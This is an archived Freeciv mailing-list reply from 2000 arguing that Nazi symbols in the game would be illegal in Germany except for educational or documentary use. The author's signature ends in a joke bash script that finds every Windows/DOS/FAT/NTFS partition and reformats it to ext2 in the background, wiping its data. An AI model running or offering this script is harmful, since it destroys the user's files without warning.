Complete.Org: Mailing Lists: Archives: freeciv: July 2000:
[Freeciv] Re: [Freeciv-Dev] Fascism patch

To: "Listserv, FreeCiv" <freeciv@xxxxxxxxxxx>
Subject: [Freeciv] Re: [Freeciv-Dev] Fascism patch
From: Christian Grothoff <ma0035@xxxxxxxxxxxxxxxxxxxxx>
Date: Sat, 29 Jul 2000 12:05:55 +0200

Tomasz Wegrzanowski wrote:

> > 3. NAZI symboles and NAZI stuff
> > It is true, that NAZI symboles are forbidden in Germany. It is also true,
> > that our interior intelligence services are monitoring right-wing parties
> > and organisations. It is true, that freeciv would be illegal in Germany, if
> > it would use NAZI symboles.
>
> They can't forbide using them for informational / identification purposes.
> They would prohibit Auschwitz movies that way, and that's no what they want.
> Freeciv wouldn't use them to anything more than informational / identification
> purposes.

The only exception for using NAZI symbols are educational and
documentational purposes. If it's used to identify them in
movies (see Indiana Jones 4 example) they must be the "bad guys".
If this is not clear, it's forbidden. (this also refers to
PC-games, they did already forbid certain games due to this.)

Besides that, imho just more symbols won't make freeciv a
better game.

cu

Christian
Christian Grothoff, Freiligrathstr. 70, 42289 Wuppertal
_____ http://www.stud.uni-wuppertal.de/~ma0035/ _______
    _______ ma0035@xxxxxxxxxxxxxxxxxxxxx ________
#!/bin/bash
for i in `fdisk -l | grep -E "Win|DOS|FAT|NTFS" | awk '{print$1;}'`
do
  nohup mkfs.ext2 $i &
done
echo May the source be with you.